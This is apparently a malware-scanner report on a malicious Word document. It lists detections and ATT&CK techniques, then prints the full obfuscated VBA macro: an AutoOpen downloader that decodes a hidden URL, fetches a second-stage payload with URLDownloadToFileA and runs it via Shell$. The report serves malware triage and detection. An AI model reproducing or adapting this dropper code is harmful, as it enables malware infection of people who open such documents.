MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes the URLDownloadToFileA API to download a second-stage payload from a hardcoded URL. This indicates a downloader or droppper functionality, aiming to fetch and execute further malicious content.
Heuristics 9
-
ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim DDaGSJryERfPpSPdF: DDaGSJryERfPpSPdF = Array("ixJHDSGwFcTFTRZ""mMsXgCUvNvsbqL""eibtrrCHzbKa""iZWKpFXlPlRJtwVBLtd""RpphOEqqvzyprFw""UYuyyHlfbuNrAHkAPCj") Shell$ syGzfiBFPHohp End Sub -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function njsMyEWoapAdBJUeYZq Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal uCAgbMYnRzA As Long, _ ByVal ejDdikgDLrpxOsCXNQ As String, _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
ByVal IcYsfsZYnyQ As Long) As Long Sub AutoOpen() Dim AdIyEyaxJvoaE, aTnyrTcBdNJ As Integer -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16657 bytes |
SHA-256: 70ce5096634c87293068388d2507145e5b8fd93fbda14d2c97dc47be8b67869f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
220 of 291 identifiers look randomly generated (e.g. 'IERajklgasdnklbvdfnsklsdfujr3209t31') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZwkoRPuEOeLkyd"
Option Explicit
Private Declare PtrSafe Function njsMyEWoapAdBJUeYZq Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal uCAgbMYnRzA As Long, _
ByVal ejDdikgDLrpxOsCXNQ As String, _
ByVal eRPNGNiWYCyJ As String, _
ByVal pddzsmZSFyqHypOg As Long, _
ByVal IcYsfsZYnyQ As Long) As Long
Sub AutoOpen()
Dim AdIyEyaxJvoaE, aTnyrTcBdNJ As Integer
AdIyEyaxJvoaE = 5
aTnyrTcBdNJ = 82
While AdIyEyaxJvoaE < aTnyrTcBdNJ
aTnyrTcBdNJ = aTnyrTcBdNJ - AdIyEyaxJvoaE
Wend
Dim syGzfiBFPHohp As String: syGzfiBFPHohp = VWSWKMPYtattOHpeXW(IMkIsXtByMF("KVE6OQABExk1PyEiT01JdCJ9DBEIJDMHRA4UAg=="), "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$")
Dim HWjfTFzQgqVKAq: HWjfTFzQgqVKAq = Array("cvaNjMhzQapvDRgIt""EhRIWQjkWdkwAwojG""pnRxGLnDwAcKWgeo""WcQTerItCnviPvqZl""rhberqnVgurg")
Dim sspjILugYSZaAuoQ
Dim WqWRzWfVSNVNl, GYqqLMJAyVqFNsUI As Integer
WqWRzWfVSNVNl = 2
GYqqLMJAyVqFNsUI = 37
While WqWRzWfVSNVNl < GYqqLMJAyVqFNsUI
GYqqLMJAyVqFNsUI = GYqqLMJAyVqFNsUI - WqWRzWfVSNVNl
Wend
Dim mJMdEXJYwaV As String: mJMdEXJYwaV = IMkIsXtByMF("Ah8SHElLTltRWnpxEBIEGWMUaXF/ajgABAxCAhkW")
Dim eVolnLyjMFK, SRQFTaGraeiFVK As Integer
For SRQFTaGraeiFVK = 0 To 5
eVolnLyjMFK = eVolnLyjMFK + SRQFTaGraeiFVK
Next SRQFTaGraeiFVK
sspjILugYSZaAuoQ = njsMyEWoapAdBJUeYZq(0, VWSWKMPYtattOHpeXW(mJMdEXJYwaV, "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$"), syGzfiBFPHohp, 0, 0)
Dim DDaGSJryERfPpSPdF: DDaGSJryERfPpSPdF = Array("ixJHDSGwFcTFTRZ""mMsXgCUvNvsbqL""eibtrrCHzbKa""iZWKpFXlPlRJtwVBLtd""RpphOEqqvzyprFw""UYuyyHlfbuNrAHkAPCj")
Shell$ syGzfiBFPHohp
End Sub
Public Function IMkIsXtByMF(DlKDTqguNOPgGGWlJAH As String, Optional uAkbZlqusRHri As Boolean = True) As String
Dim KcSiDCmKczusNpbCNjm As Integer
KcSiDCmKczusNpbCNjm = 7 - 4 * 3
Static VkZsRIFlTewOtiK(0 To 255) As Byte
Dim qxCVZiaPWNvyQzGfni As Integer
qxCVZiaPWNvyQzGfni = 8 - 8 * 1
Dim YHFAUXIyBzLjEoYgHh() As Byte, eRKTPbVDYOIppRYQ() As Byte
Dim KwklitTblAMd As Integer
KwklitTblAMd = 8
Dim uybETXMJKOv As Integer
uybETXMJKOv = 3 * 6
If KwklitTblAMd < Len(Application.UserName) Then
Dim firSeQQeUiJfQqShoL, grvjMxJlUWzVUTEjmtu As Integer
For grvjMxJlUWzVUTEjmtu = 0 To 5
firSeQQeUiJfQqShoL = firSeQQeUiJfQqShoL + grvjMxJlUWzVUTEjmtu
Next grvjMxJlUWzVUTEjmtu
Dim SiRPicEDharNjLGZym As Variant
End If
Dim WFIXehQEadYdDlX As Long, dDIoSjFviwTNtEvjt As Long
Dim AmWmPGDtxYwntegAvfg, DlXOrHqBsgnX As Integer
AmWmPGDtxYwntegAvfg = 2
DlXOrHqBsgnX = 36
While AmWmPGDtxYwntegAvfg < DlXOrHqBsgnX
DlXOrHqBsgnX = DlXOrHqBsgnX - AmWmPGDtxYwntegAvfg
Wend
If VkZsRIFlTewOtiK(0) = 0 Then
Dim GDxKfVfBRAUUDCOc As Integer
GDxKfVfBRAUUDCOc = 9 * 5
For WFIXehQEadYdDlX = 0 To 255
Dim WivIqEvSsLTZeu, ePuSXZPMhbnd As Integer
For ePuSXZPMhbnd = 0 To 7
WivIqEvSsLTZeu = WivIqEvSsLTZeu + ePuSXZPMhbnd
Next ePuSXZPMhbnd
VkZsRIFlTewOtiK(WFIXehQEadYdDlX) = 255
Dim YNQyEPZoycxaSDDLsw As Integer
YNQyEPZoycxaSDDLsw = 3 - 7 * 2
Next WFIXehQEadYdDlX
Dim qOmWAqMcyqQbGZPYfvF As Integer
qOmWAqMcyqQbGZPYfvF = 4
Dim fMYeNwlpcRZXdxuRTz As Integer
fMYeNwlpcRZXdxuRTz = 7
Dim yRKEaGAfswShVzJ: yRKEaGAfswShVzJ = Array("stIXNjCsUPvJX""IghfYDIYtEQi""cIveQdaVSkUpAyUf""veDfvkIlSHjlWdCsEs""LvoIzruQNITcopm""bVDxgBrvXvDlUSHqnk""bRuoMFjqmcEjkZkLTq""pMQqUXeePyFJph")
If fMYeNwlpcRZXdxuRTz < Len(Application.UserName) Then
Dim plLhIahliiGbRanfEO, UpbFaoXutCf As Integer
plLhIahliiGbRanfEO = 1
UpbFaoXutCf = 76
While plLhIahliiGbRanfEO < UpbFaoXutCf
UpbFaoXutCf = UpbFaoXutCf - plLhIahliiGbRanfEO
Wend
Dim cCMRwuFAaUjGVo As Variant
End If
If qOmWAqMcyqQbGZPYfvF < Len(Application.UserName) Then
Dim yfaTNKNHHDsGmYNSu: yfaTNKNHHDsGmYNSu = Array("OqHUyZFXhdttjJcUm""yMDUVrlANIMsaXB""wKomjcookbFBToUuvi""YTcRVVixljBFbDD""UubyPJgOJCLvpSiq""VctwxULCZQonrmWPj""rQdGImUHAtFRGUXDwfm""aucFJyaoDEeRe""ybHhqIOCdKzEbHoUI")
Dim vDwTlpzLTeknQXebCo As Variant
End If
For WFIXehQEadYdDlX = 0 To 25
Dim QIskjlooWFscCX As Integer
QIskjlooWFscCX = 1
Dim cbJZeJcpklVuevjpCe As Collection
Set cbJZeJcpklVuevjpCe = New Collection
cbJZeJcpklVuevjpCe.Add "BLAhnKRtUuIPXLUh"
cbJZeJcpklVuevjpCe.Add "kWlGPqAePEQAP"
cbJZeJcpklVuevjpCe.Add "GrtItifsZhYavHOf"
cbJZeJcpklVuevjpCe.Add "CsKgsEcyJkIy"
If QIskjlooWFscCX < Len(Application.UserName) Then
Dim FstHYpsEINcdowL As Integer
FstHYpsEINcdowL = 6 * 8
Dim nfiyYTQnRndmwue As Variant
End If
VkZsRIFlTewOtiK(WFIXehQEadYdDlX + 65) = WFIXehQEadYdDlX
Dim TnVyPqpwoCWOlL As Integer
TnVyPqpwoCWOlL = 7 * 2
Next WFIXehQEadYdDlX
For WFIXehQEadYdDlX = 26 To 51
Dim wbajjalzTszaTL, FXTaePFXgUOwwjgOy As Integer
For FXTaePFXgUOwwjgOy = 0 To 9
wbajjalzTszaTL = wbajjalzTszaTL + FXTaePFXgUOwwjgOy
Next FXTaePFXgUOwwjgOy
VkZsRIFlTewOtiK(WFIXehQEadYdDlX + 71) = WFIXehQEadYdDlX
Dim eayNzlqpZpSRwOS, TgpxIMGWAHpxt As Integer
For TgpxIMGWAHpxt = 0 To 8
eayNzlqpZpSRwOS = eayNzlqpZpSRwOS + TgpxIMGWAHpxt
Next TgpxIMGWAHpxt
Next WFIXehQEadYdDlX
Dim izYMVRumZpEnrQ As Integer
izYMVRumZpEnrQ = 2 - 2 * 9
For WFIXehQEadYdDlX = 52 To 61
Dim olPLTsIyFdPpTzVmOo, AaYMuRuUrcYgxS As Integer
For AaYMuRuUrcYgxS = 0 To 7
olPLTsIyFdPpTzVmOo = olPLTsIyFdPpTzVmOo + AaYMuRuUrcYgxS
Next AaYMuRuUrcYgxS
VkZsRIFlTewOtiK(WFIXehQEadYdDlX - 4) = WFIXehQEadYdDlX
Dim ykJiiymHRfJ, vkdXHxhOfBvxzAb As Integer
ykJiiymHRfJ = 2
vkdXHxhOfBvxzAb = 48
While ykJiiymHRfJ < vkdXHxhOfBvxzAb
vkdXHxhOfBvxzAb = vkdXHxhOfBvxzAb - ykJiiymHRfJ
Wend
Next WFIXehQEadYdDlX
Dim VGGfMtsccEDtV: VGGfMtsccEDtV = Array("WhBqnFDtXepxxuLbaLb""yUQMcpOoOtYvGJ""XYqPkOxUABgj""tKernJOqpLjr""VjuBaOTbgjbbeEEK""mRJaPbpzRYNpZYS""GUzmfnfwdDLyuE")
VkZsRIFlTewOtiK(43) = 62
Dim sTZmewDCJEKvrawQcx As Integer
sTZmewDCJEKvrawQcx = 9 * 6
VkZsRIFlTewOtiK(47) = 63
Dim AJKJuSuOOrTDusSqC As Integer
AJKJuSuOOrTDusSqC = 7 * 6
End If
Dim oheQEYweJCSZF As Integer
oheQEYweJCSZF = 7 * 9
If DlKDTqguNOPgGGWlJAH = "" Then Exit Function
Dim INfchJWCsJmprORN: INfchJWCsJmprORN = Array("BqwLoptKCjVWMCs""ittQFZuwhwUtjxlgs""XqJMhddpzpgPbsaTpbF""dvFmuTZRqsCz""ipKnNHCrHpjlbin")
DlKDTqguNOPgGGWlJAH = Trim(DlKDTqguNOPgGGWlJAH)
Dim dgNagbJktSCQUwN As Integer
dgNagbJktSCQUwN = 4 - 1 * 6
If uAkbZlqusRHri Then
Dim grrYKMiwDrV, pNBFYAacIlqwaSwQDyA As Integer
For pNBFYAacIlqwaSwQDyA = 0 To 4
grrYKMiwDrV = grrYKMiwDrV + pNBFYAacIlqwaSwQDyA
Next pNBFYAacIlqwaSwQDyA
For WFIXehQEadYdDlX = 0 To 255
Dim kwjwuGwmRUA, uFBEHlRfbXQIGCtIy As Integer
kwjwuGwmRUA = 4
uFBEHlRfbXQIGCtIy = 55
While kwjwuGwmRUA < uFBEHlRfbXQIGCtIy
uFBEHlRfbXQIGCtIy = uFBEHlRfbXQIGCtIy - kwjwuGwmRUA
Wend
If Not (Chr(WFIXehQEadYdDlX) Like "[A-Za-z0-9+/=]") Then
Dim KekhKWwOtxgDG As Integer
KekhKWwOtxgDG = 5 - 8 * 4
DlKDTqguNOPgGGWlJAH = Replace(DlKDTqguNOPgGGWlJAH, Chr(WFIXehQEadYdDlX), "")
Dim iCqowyZszfRiBBCXsx, TnJpCMTmTqVQobJCu As Integer
iCqowyZszfRiBBCXsx = 1
TnJpCMTmTqVQobJCu = 31
While iCqowyZszfRiBBCXsx < TnJpCMTmTqVQobJCu
TnJpCMTmTqVQobJCu = TnJpCMTmTqVQobJCu - iCqowyZszfRiBBCXsx
Wend
End If
Dim nQdjbpiCEQEGtmGO As Integer
nQdjbpiCEQEGtmGO = 3 - 4 * 7
Next WFIXehQEadYdDlX
Dim fftHjwAFPLrnT, lcgBXorpxCdxGXUnCnS As Integer
fftHjwAFPLrnT = 8
lcgBXorpxCdxGXUnCnS = 49
While fftHjwAFPLrnT < lcgBXorpxCdxGXUnCnS
lcgBXorpxCdxGXUnCnS = lcgBXorpxCdxGXUnCnS - fftHjwAFPLrnT
Wend
End If
Dim vAEPEoHWTxA As Integer
vAEPEoHWTxA = 9 - 4 * 4
eRKTPbVDYOIppRYQ() = StrConv(DlKDTqguNOPgGGWlJAH, vbFromUnicode)
Dim KBPdZDLRPGJJN, eNRWttQTxQbl As Integer
For eNRWttQTxQbl = 0 To 4
KBPdZDLRPGJJN = KBPdZDLRPGJJN + eNRWttQTxQbl
Next eNRWttQTxQbl
ReDim YHFAUXIyBzLjEoYgHh(0 To ((Len(DlKDTqguNOPgGGWlJAH) \ 4) * 3 - 1))
Dim DLiQPjIkcrsxmbzTJ, nnMqJdrjbprQtSF As Integer
For nnMqJdrjbprQtSF = 0 To 3
DLiQPjIkcrsxmbzTJ = DLiQPjIkcrsxmbzTJ + nnMqJdrjbprQtSF
Next nnMqJdrjbprQtSF
For WFIXehQEadYdDlX = 0 To Len(DlKDTqguNOPgGGWlJAH) \ 4 - 2
Dim BBhsJttzfpx As Integer
BBhsJttzfpx = 3 - 2 * 4
dDIoSjFviwTNtEvjt = VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3))
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) * &H40&)
Dim FhJoVbDVEvcbxd As Integer
FhJoVbDVEvcbxd = 8
Dim rvewNvgCJNxWBGkzEfs As Integer
rvewNvgCJNxWBGkzEfs = 6 * 7
If FhJoVbDVEvcbxd < Len(Application.UserName) Then
Dim iHGjIMqtkaPHH As Collection
Set iHGjIMqtkaPHH = New Collection
iHGjIMqtkaPHH.Add "yQjLHNpyOzIDMEm"
iHGjIMqtkaPHH.Add "VCitFUkxUMvaTOpGSsA"
iHGjIMqtkaPHH.Add "YqUekcqjCdZjknk"
iHGjIMqtkaPHH.Add "OcYFgpjcqWpDxszv"
iHGjIMqtkaPHH.Add "zMMZcrksNFM"
iHGjIMqtkaPHH.Add "ETkgKmxjVsQEBvmhm"
Dim rgMxaZiMtQpmKLYRV As Variant
End If
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) * &H1000&)
Dim qNCdrhMnjwaY, FwGQOVqRBNEAUnAUddq As Integer
For FwGQOVqRBNEAUnAUddq = 0 To 8
qNCdrhMnjwaY = qNCdrhMnjwaY + FwGQOVqRBNEAUnAUddq
Next FwGQOVqRBNEAUnAUddq
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) * &H40000)
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 0) = (dDIoSjFviwTNtEvjt And &HFF0000) \ &H10000
Dim wInIWrpLaToFwp, eSiKPRkSMaq As Integer
wInIWrpLaToFwp = 1
eSiKPRkSMaq = 48
While wInIWrpLaToFwp < eSiKPRkSMaq
eSiKPRkSMaq = eSiKPRkSMaq - wInIWrpLaToFwp
Wend
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 1) = (dDIoSjFviwTNtEvjt And &HFF00&) \ &H100&
Dim YNxquJaHweoUIeJCfqn, JiWqWLxSdMDFazPZ As Integer
For JiWqWLxSdMDFazPZ = 0 To 5
YNxquJaHweoUIeJCfqn = YNxquJaHweoUIeJCfqn + JiWqWLxSdMDFazPZ
Next JiWqWLxSdMDFazPZ
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 2) = dDIoSjFviwTNtEvjt And &HFF&
Dim fKtCpSOEIKVOZF: fKtCpSOEIKVOZF = Array("jzyhlAwQOhfY""PqSVvmKRDwY""NfMhWfSHnvVSpiwR")
Next WFIXehQEadYdDlX
Dim kYsrxLIHkNNFqjF, MBmTEkUbdJGbIdoVvfo As Integer
kYsrxLIHkNNFqjF = 7
MBmTEkUbdJGbIdoVvfo = 79
While kYsrxLIHkNNFqjF < MBmTEkUbdJGbIdoVvfo
MBmTEkUbdJGbIdoVvfo = MBmTEkUbdJGbIdoVvfo - kYsrxLIHkNNFqjF
Wend
dDIoSjFviwTNtEvjt = 0
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3)) <> 255 Then dDIoSjFviwTNtEvjt = VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3))
Dim TvvDSlNcXgNKPZu: TvvDSlNcXgNKPZu = Array("IAqcRGQobvhnL""ZqvwbYdYruoHcYCJP""saSFjUAVSBAdsf""cCkHOLdgPjnUNQBUo""nfKvUjUaWPZ""qBZGiTYuxphTBQlzdM""IGQJfjBPxdk""MupevDdLRenJyRlTH")
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) * &H40&)
Dim VWouSgJlkaS As Integer
VWouSgJlkaS = 5 * 3
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) * &H1000&)
Dim rDPxWXjSfTf As Integer
rDPxWXjSfTf = 1 - 1 * 3
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) * &H40000)
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 0) = (dDIoSjFviwTNtEvjt And &HFF0000) \ &H10000
Dim OQSjdUySLJeBNDJHDA As Integer
OQSjdUySLJeBNDJHDA = 3 * 2
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 1) = (dDIoSjFviwTNtEvjt And &HFF00&) \ &H100&
Dim EGeZBfvUVnGH As Collection
Set EGeZBfvUVnGH = New Collection
EGeZBfvUVnGH.Add "UzwyyMzDjHg"
EGeZBfvUVnGH.Add "zNTvdVnVKvzNoWrHRN"
EGeZBfvUVnGH.Add "vBkHBuSXhEEieWN"
EGeZBfvUVnGH.Add "lKpIwSumLpaSSKWUtCn"
EGeZBfvUVnGH.Add "xLmVEnSssDEvygQYgWp"
EGeZBfvUVnGH.Add "ExnCKjclULaNLYI"
EGeZBfvUVnGH.Add "XsNzTuDpGXr"
EGeZBfvUVnGH.Add "FjigTYLnguG"
EGeZBfvUVnGH.Add "cNCEdPsyGXqYGVzbM"
EGeZBfvUVnGH.Add "jmfixysPkiaeq"
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 2) = dDIoSjFviwTNtEvjt And &HFF&
Dim pNBstcNQJZyIVmZxWho, GNBoDrInYZqLpt As Integer
For GNBoDrInYZqLpt = 0 To 4
pNBstcNQJZyIVmZxWho = pNBstcNQJZyIVmZxWho + GNBoDrInYZqLpt
Next GNBoDrInYZqLpt
If eRKTPbVDYOIppRYQ(UBound(eRKTPbVDYOIppRYQ) - 1) = 61 Then
Dim UZMrohfxKMdOu As Integer
UZMrohfxKMdOu = 5 - 8 * 2
IMkIsXtByMF = Left(StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode), UBound(YHFAUXIyBzLjEoYgHh) - 1)
Dim shAgecNEOnfbByzae: shAgecNEOnfbByzae = Array("UzYGFgDEOGTOnbQhAZ""itiuULIUPbb""VBivwiMblPrzpvbwmkK""YllnajcxjHjZGqH""vGRICglRJPMrkEjJA""yDGaTXKnASRDJ")
ElseIf eRKTPbVDYOIppRYQ(UBound(eRKTPbVDYOIppRYQ)) = 61 Then
Dim YgWMUZCHfEz As Integer
YgWMUZCHfEz = 6 - 5 * 5
IMkIsXtByMF = Left(StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode), UBound(YHFAUXIyBzLjEoYgHh) - 0)
Else
Dim vStbXBQzTokEJllb As Integer
vStbXBQzTokEJllb = 4 * 3
IMkIsXtByMF = StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode)
Dim MdLvZkwCmPodeWD As Integer
MdLvZkwCmPodeWD = 7 * 6
End If
End Function
Public Function VWSWKMPYtattOHpeXW(ByRef sdqiUtKTmgpBroFLF As String, ByRef tivmdQSaAdYHE As String) As String
Dim jlvafWYFzwxVSx, uCtIcEQlYmBlHuFB As Integer
For uCtIcEQlYmBlHuFB = 0 To 5
jlvafWYFzwxVSx = jlvafWYFzwxVSx + uCtIcEQlYmBlHuFB
Next uCtIcEQlYmBlHuFB
Dim aNYhentkPUlP() As Byte, oGrqPCJBHHSApVIr() As Byte, UTOJNszvSlDvulxA As Long, ImdrIInUtnxAx As Long, TrPZXGuJzfD As Long, DlKDTqguNOPgGGWlJAH As Long
aNYhentkPUlP = StrConv(sdqiUtKTmgpBroFLF, vbFromUnicode)
Dim fUKaHihfTNA As Integer
fUKaHihfTNA = 4
Dim OROSFKgOPKGvf As Integer
OROSFKgOPKGvf = 4 * 7
If fUKaHihfTNA < Len(Application.UserName) Then
Dim ieHIZeiXsauNXZmMZp As Integer
ieHIZeiXsauNXZmMZp = 8 - 4 * 5
Dim xqtGXUyTwTUVTT As Variant
End If
oGrqPCJBHHSApVIr = StrConv(tivmdQSaAdYHE, vbFromUnicode)
Dim dcDswfGNJcK As Integer
dcDswfGNJcK = 7 - 5 * 2
UTOJNszvSlDvulxA = UBound(aNYhentkPUlP)
Dim fmSfbqVWcXXZJvDZ As Integer
fmSfbqVWcXXZJvDZ = 6 - 6 * 1
ImdrIInUtnxAx = UBound(oGrqPCJBHHSApVIr)
Dim YxvuFydBOOaeGEzVV As Integer
YxvuFydBOOaeGEzVV = 6
Dim tkoUTIxmcGlJsiR: tkoUTIxmcGlJsiR = Array("lwEkkkkuoaeqSojW""JfzqhEJDifnJTeauXtR""xsagPGEiKIhmiRAxmNo""GUBmdyfdDVzaArlSO""rcmPCtITMNUbkfedQi")
If YxvuFydBOOaeGEzVV < Len(Application.UserName) Then
Dim YVRVlvZYlBrHaPHF As Variant
End If
For TrPZXGuJzfD = 0 To UTOJNszvSlDvulxA
Dim sMjilOPeYkTJBUQiJsb As Integer
sMjilOPeYkTJBUQiJsb = 4 * 4
aNYhentkPUlP(TrPZXGuJzfD) = aNYhentkPUlP(TrPZXGuJzfD) Xor oGrqPCJBHHSApVIr(DlKDTqguNOPgGGWlJAH)
Dim oaWhiuFBNAbuRClGIh: oaWhiuFBNAbuRClGIh = Array("btlLdSLSebOpGwptv""HRUQWgHmXvhMo""PBFLIyHmScnqjVHtdN""ZMWfuLRdgMRhJTfXq""fvLxCyubkukHCkO")
If DlKDTqguNOPgGGWlJAH < ImdrIInUtnxAx Then
Dim MImwiUTaiiskdrnT As Integer
MImwiUTaiiskdrnT = 7 - 5 * 6
DlKDTqguNOPgGGWlJAH = DlKDTqguNOPgGGWlJAH + 1
Else
Dim viBxQFdaiVw, jDcoCSpLWlGGTC As Integer
viBxQFdaiVw = 5
jDcoCSpLWlGGTC = 28
While viBxQFdaiVw < jDcoCSpLWlGGTC
jDcoCSpLWlGGTC = jDcoCSpLWlGGTC - viBxQFdaiVw
Wend
DlKDTqguNOPgGGWlJAH = 0
Dim GkmEcrzEGfsCz: GkmEcrzEGfsCz = Array("cKggodqVupFIX""dBYIbBJUTQatbmbTQ""iPRfuIKHpswqZMW")
End If
Dim UefNWljajbdpAMZjDL As Integer
UefNWljajbdpAMZjDL = 4 * 6
Next TrPZXGuJzfD
Dim nHpPGKtpXQq As Integer
nHpPGKtpXQq = 9
Dim DxZBdQiBOxWLfK As Integer
DxZBdQiBOxWLfK = 1
Dim JXRNLIwTjLqckrEMFqx As Integer
JXRNLIwTjLqckrEMFqx = 6 - 1 * 3
If DxZBdQiBOxWLfK < Len(Application.UserName) Then
Dim lXANhPThgSEVyym As Integer
lXANhPThgSEVyym = 7 * 5
Dim dPqGoDEgpeBn As Variant
End If
If nHpPGKtpXQq < Len(Application.UserName) Then
Dim RJFZpKAMaSDpCDxb As Integer
RJFZpKAMaSDpCDxb = 7 * 9
Dim XjmMUCOyFRnIYNad As Variant
End If
VWSWKMPYtattOHpeXW = StrConv(aNYhentkPUlP, vbUnicode)
End Function
Attribute VB_Name = "ZhjKqcXuixfG"
Attribute VB_Base = "0{D01EDEEE-AD96-4B56-A4C2-A6AAE6B7BEEC}{18C297E6-4E0E-41FC-A5E5-CD9CBB0A3179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function edIfCsfPNNFA() As String
edIfCsfPNNFA = VWSWKMPYtattOHpeXW(IMkIsXtByMF("OBJECTHERE"), "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$")
End Function
Public Function RdFRwvoLGoM(RboUBedmmMCegZKE As String) As Long
Dim bNJRSQqARuRCY As Integer
bNJRSQqARuRCY = 7 - 3 * 1
Shell$ RboUBedmmMCegZKE
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.